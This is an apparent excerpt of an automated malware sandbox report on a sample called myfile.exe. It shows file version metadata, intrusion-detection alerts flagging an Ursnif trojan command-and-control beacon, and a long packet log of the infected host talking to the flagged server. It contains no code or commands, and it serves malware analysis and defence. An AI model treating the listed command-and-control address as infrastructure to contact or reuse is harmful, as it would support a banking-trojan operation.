ProductVersion | 1.0.0.0 |
FileDescription | |
OriginalFilename | myfile.exe |
Translation | 0x0409 0x04b0 |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
05/04/22-16:26:18.722944 05/04/22-16:26:18.722944 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49743 | 80 | 192.168.2.3 | 13.107.42.16 |
05/04/22-16:26:39.201905 05/04/22-16:26:39.201905 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
05/04/22-16:26:39.682098 05/04/22-16:26:39.682098 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
05/04/22-16:26:38.797354 05/04/22-16:26:38.797354 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 4, 2022 16:26:38.779316902 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:38.796758890 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:38.796883106 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:38.797353983 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:38.814405918 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.082268000 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.083127022 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.083252907 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.083272934 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.083295107 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.083318949 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.083334923 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.083336115 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.083353996 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.083375931 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.083380938 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.083393097 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.083410025 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.083415031 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.083456039 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.083477974 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.083482981 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.083498001 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.083518982 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.083519936 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.083580971 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.100159883 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.100208998 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.100228071 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.100330114 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.100420952 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.100447893 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.100459099 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.100737095 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.100749016 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.100776911 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.100791931 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.100804090 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.100850105 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.100902081 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.100938082 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.100958109 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.100964069 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.100986958 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.101146936 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.101171970 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.101188898 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.101214886 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.101238012 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.101394892 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.101422071 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.101438046 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.101465940 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.101494074 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.101670980 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.101699114 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.101716042 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.101752996 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.101887941 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.101942062 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.101955891 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.101974964 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.102000952 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.102318048 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.102345943 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.102360964 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.102387905 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.102423906 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.102437019 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.102489948 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.102507114 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.102576971 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.117383003 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117428064 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117448092 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117470980 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117496014 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117512941 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117526054 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.117537022 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117561102 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117577076 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117600918 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117614031 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.117625952 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117641926 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117655039 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.117693901 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.117820978 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117846012 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117861032 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117892981 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.117939949 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117961884 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.117991924 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.117997885 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118016958 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118031025 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118041039 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118084908 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118099928 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118103981 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118108988 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118125916 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118175983 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118262053 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118288994 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118314028 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118329048 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118347883 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118355989 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118360043 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118372917 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118396997 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118412971 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118417978 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118434906 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118457079 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118482113 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118498087 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118513107 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118519068 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118520975 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118541956 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118545055 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118568897 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118585110 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118592024 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118618011 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.118927956 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118953943 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118977070 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.118999004 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119000912 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119018078 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119029999 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119079113 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119124889 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119139910 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119174004 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119200945 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119223118 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119223118 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119240999 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119246960 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119323969 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119349957 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119371891 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119375944 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119400978 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119400978 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119412899 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119421959 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.119461060 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.119510889 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135061979 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135130882 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135174990 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135212898 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135245085 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135261059 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135286093 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135313988 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135325909 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135353088 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135365963 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135394096 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135406971 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135436058 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135437965 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135476112 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135477066 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135516882 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135555029 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135555983 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135597944 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135607958 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135622978 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135637045 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135668039 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135668993 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135703087 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135708094 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135751009 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135793924 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135793924 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135824919 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135835886 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135863066 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135875940 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135904074 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135915995 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135931015 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.135941982 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135981083 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.135993958 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136020899 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136046886 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136060953 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136094093 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136101961 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136112928 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136142015 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136171103 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136210918 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136214972 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136250973 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136291981 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136296988 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136327982 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136332035 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136362076 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136373043 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136404037 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136415005 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136442900 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136445999 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136471033 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136507034 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136548996 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136589050 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136629105 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136648893 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136670113 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136672974 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136709929 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136713982 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136739016 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136742115 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136765957 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136785030 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136825085 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136837006 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136863947 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136878014 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136904001 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136941910 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.136943102 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136966944 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.136981964 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137020111 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137021065 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137042999 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137059927 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137079954 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137090921 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137130022 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137135983 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137170076 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137198925 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137211084 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137223959 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137249947 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137278080 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137284994 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137319088 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137319088 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137358904 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137399912 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137403965 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137438059 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137440920 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137455940 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137480021 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137505054 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137518883 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137531996 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137557983 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137576103 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137597084 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137635946 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137635946 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137667894 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137666941 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
May 4, 2022 16:26:39.137698889 CEST | 49748 | 80 | 192.168.2.3 | 185.189.151.28 |
May 4, 2022 16:26:39.137708902 CEST | 80 | 49748 | 185.189.151.28 | 192.168.2.3 |
